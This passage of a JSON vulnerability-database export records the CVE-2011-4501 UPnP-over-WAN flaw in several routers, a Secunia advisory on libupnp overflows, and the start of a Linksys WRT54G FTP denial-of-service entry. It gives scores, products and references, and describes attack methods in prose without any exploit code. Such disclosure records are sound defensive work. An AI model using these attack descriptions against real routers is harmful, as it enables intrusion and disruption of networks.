"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CARNEGIE MELLON",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 9.4,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "NONE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 8.0,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 10.0,
"id": "VU#357851",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "WORKAROUND",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInterationRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2011-4501",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-52446",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-4501",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#357851",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201111-363",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-52446",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "VULHUB",
"id": "VHN-52446"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003031"
},
{
"db": "NVD",
"id": "CVE-2011-4501"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-363"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The UPnP IGD implementation in Edimax EdiLinux on the Edimax BR-6104K with firmware before 3.25, Edimax 6114Wg, Canyon-Tech CN-WF512 with firmware 1.83, Canyon-Tech CN-WF514 with firmware 2.08, Sitecom WL-153 with firmware before 1.39, and Sweex LB000021 with firmware 3.15 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an \"external forwarding\" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Multiple routers that support Universal Plug and Play (UPnP) have insufficient access restrictions: on affected routers, UPnP requests are unintentionally accepted on the WAN-side interface. An unauthenticated remote third party could obtain local network information or use the product as a proxy. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to internal hosts behind the NAT firewall or to proxy connections through it. Remote unauthenticated attackers can exploit the vulnerabilities to scan internal hosts or to proxy Internet traffic through the device. 
\nThe following devices are affected:\nCisco Linksys WRT54G firmware version prior to 4.30.5\nCisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1\nCisco Linksys WRT54GS v4 firmware versions prior to 1.06.1\nCisco Linksys WRT54GX firmware 2.00.05\nEdimax BR-6104K prior to 3.25\nEdimax 6114Wg\nCanyon-Tech CN-WF512 firmware version 1.83\nCanyon-Tech CN-WF514 firmware version 2.08\nSitecom WL-153 prior to firmware 1.39\nSitecom WL-111\nSweex LB000021 firmware version 3.15\nZyXEL P-330W\nSpeedTouch 5x6 firmware versions prior to 6.2.29\nThomson TG585 firmware versions prior to 7.4.3.2. Vulnerabilities exist in the UPnP IGD installation and enablement of Edimax EdiLinux for various versions of Edimax. This vulnerability is related to the \\\"external forwarding\\\" vulnerability. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSiemens OZW / OZS Multiple Products libupnp Buffer Overflow\nVulnerabilities\n\nSECUNIA ADVISORY ID:\nSA52035\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/52035/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nRELEASE DATE:\n2013-01-31\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/52035/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/52035/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * 
CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in multiple Siemens OZW\nand OZS products, which can be exploited by malicious people to\ncompromise a vulnerable device. \n\n1) Multiple vulnerabilities are caused due to a bundled version of\nlibupnp. \n\nFor more information:\nSA51949\n\n2) Multiple boundary errors within the \"unique_service_name()\"\nfunction (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests\ncan be exploited to cause stack-based buffer overflows. The vendor is planning\nto provide fixes with upcoming firmware updates. \n\nPROVIDED AND/OR DISCOVERED BY:\n2) Rapid7\n\nORIGINAL ADVISORY:\nSiemens SSA-963338:\nhttp://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf\n\nRapid7:\nhttps://community.rapid7.com/docs/DOC-2150\nhttps://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against 
the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. This library is used in several vendor network\ndevices in addition to media streaming and file sharing applications. \nThese vulnerabilities were disclosed on January 29th, 2013 in a CERT\nVulnerability Note, VU#922681, which can be viewed at:\n\nhttp://www.kb.cert.org/vuls/id/922681\n\nCisco is currently evaluating products for possible exposure to these\nvulnerabilities. This advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+\nga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5\n=6sTu\n-----END PGP SIGNATURE-----\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4501"
},
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003031"
},
{
"db": "CNVD",
"id": "CNVD-2011-5058"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "VULHUB",
"id": "VHN-52446"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
}
],
"trust": 4.86
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851",
"trust": 5.8
},
{
"db": "NVD",
"id": "CVE-2011-4501",
"trust": 3.4
},
{
"db": "SIEMENS",
"id": "SSA-963338",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#922681",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003031",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201111-363",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2011-5058",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "18224",
"trust": 0.6
},
{
"db": "BID",
"id": "50810",
"trust": 0.3
},
{
"db": "SECUNIA",
"id": "52035",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-52446",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119949",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119896",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5058"
},
{
"db": "VULHUB",
"id": "VHN-52446"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003031"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4501"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-363"
}
]
},
"id": "VAR-201111-0180",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5058"
},
{
"db": "VULHUB",
"id": "VHN-52446"
}
],
"trust": 1.3453724428571427
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5058"
}
]
},
"last_update_date": "2023-12-18T12:09:29.878000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.canyon-tech.com/"
},
{
"title": "BR-6104K",
"trust": 0.8,
"url": "http://www.edimax.com/en/produce_detail.php?pd_id=58\u0026pl1_id=3\u0026pl2_id=18"
},
{
"title": "BR-6114Wg",
"trust": 0.8,
"url": "http://www.edimax.co.uk/en/produce_detail.php?pd_id=146\u0026pl1_id=1\u0026pl2_id=48"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.sitecom.com/"
},
{
"title": "LB000021",
"trust": 0.8,
"url": "http://www.sweex.com/en/assortiment/internet-networking/routers/lb000021/"
},
{
"title": "Patch for Multiple Routers UPnP WAN Interface Remote Unauthorized Access Vulnerability (CNVD-2011-5058)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/6019"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5058"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003031"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-16",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-52446"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003031"
},
{
"db": "NVD",
"id": "CVE-2011-4501"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 4.4,
"url": "http://www.kb.cert.org/vuls/id/357851"
},
{
"trust": 2.8,
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"trust": 1.7,
"url": "http://www.upnp-hacks.org/suspect.html"
},
{
"trust": 1.6,
"url": "http://homekb.cisco.com/cisco2/ukp.aspx?vw=1\u0026articleid=28341"
},
{
"trust": 1.6,
"url": "http://jvn.jp/cert/jvnvu357851"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/docs/doc-2150"
},
{
"trust": 0.9,
"url": "http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf"
},
{
"trust": 0.8,
"url": "http://toor.do/upnp.html"
},
{
"trust": 0.8,
"url": "http://www.h-online.com/security/news/item/upnp-enabled-routers-allow-attacks-on-lans-1329727.html"
},
{
"trust": 0.8,
"url": "http://toor.do/defcon-19-garcia-upnp-mapping-wp.pdf"
},
{
"trust": 0.8,
"url": "http://pupnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf"
},
{
"trust": 0.8,
"url": "http://www.rapid7.com/resources/free-security-software-downloads/universal-plug-and-play-jan-2013.jsp"
},
{
"trust": 0.8,
"url": "http://opentools.homeip.net/dev-tools-for-upnp"
},
{
"trust": 0.8,
"url": "http://upnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "http://www.dlink.com/us/en/technology/upnp"
},
{
"trust": 0.8,
"url": "http://jpn.nec.com/security-info/secinfo/nv13-003.html"
},
{
"trust": 0.8,
"url": "http://www.ipitomy.com/index.php/mi-security-notice-ip001"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4501"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4501"
},
{
"trust": 0.6,
"url": "http://www.kb.cert.org/vuls/id/357851http"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/18224"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20130129-upnp"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/922681"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5058"
},
{
"db": "VULHUB",
"id": "VHN-52446"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003031"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4501"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-363"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5058"
},
{
"db": "VULHUB",
"id": "VHN-52446"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003031"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4501"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-363"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-10-05T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2013-01-29T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5058"
},
{
"date": "2011-11-22T00:00:00",
"db": "VULHUB",
"id": "VHN-52446"
},
{
"date": "2011-11-24T00:00:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003031"
},
{
"date": "2013-01-31T07:26:31",
"db": "PACKETSTORM",
"id": "119949"
},
{
"date": "2013-01-30T02:46:44",
"db": "PACKETSTORM",
"id": "119896"
},
{
"date": "2011-11-22T11:55:04.887000",
"db": "NVD",
"id": "CVE-2011-4501"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-363"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-30T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2014-07-30T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5058"
},
{
"date": "2013-01-24T00:00:00",
"db": "VULHUB",
"id": "VHN-52446"
},
{
"date": "2015-03-19T08:33:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003031"
},
{
"date": "2013-01-24T05:00:00",
"db": "NVD",
"id": "CVE-2011-4501"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-363"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-363"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "UPnP requests accepted over router WAN interfaces",
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "configuration error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-363"
}
],
"trust": 0.6
}
}
VAR-200803-0061
Vulnerability from variot - Updated: 2023-12-18 11:53
The Linksys WRT54G router allows remote attackers to cause a denial of service (device restart) via a long username and password to the FTP interface. Linksys WRT54G Router is prone to a denial-of-service vulnerability.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200803-0061",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "wrt54g",
"scope": null,
"trust": 0.8,
"vendor": "cisco linksys",
"version": null
},
{
"model": "wrt54g",
"scope": null,
"trust": 0.6,
"vendor": "linksys",
"version": null
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "85099"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004206"
},
{
"db": "NVD",
"id": "CVE-2008-1265"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-143"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1265"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "85099"
}
],
"trust": 0.3
},
"cve": "CVE-2008-1265",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 6.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 7.8,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2008-1265",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-31390",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2008-1265",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200803-143",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-31390",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31390"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004206"
},
{
"db": "NVD",
"id": "CVE-2008-1265"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-143"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Linksys WRT54G router allows remote attackers to cause a denial of service (device restart) via a long username and password to the FTP interface. Linksys WRT54G Router is prone to a denial-of-service vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1265"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004206"
},
{
"db": "BID",
"id": "85099"
},
{
"db": "VULHUB",
"id": "VHN-31390"
}
],
"trust": 1.98
},
"external_ids": {
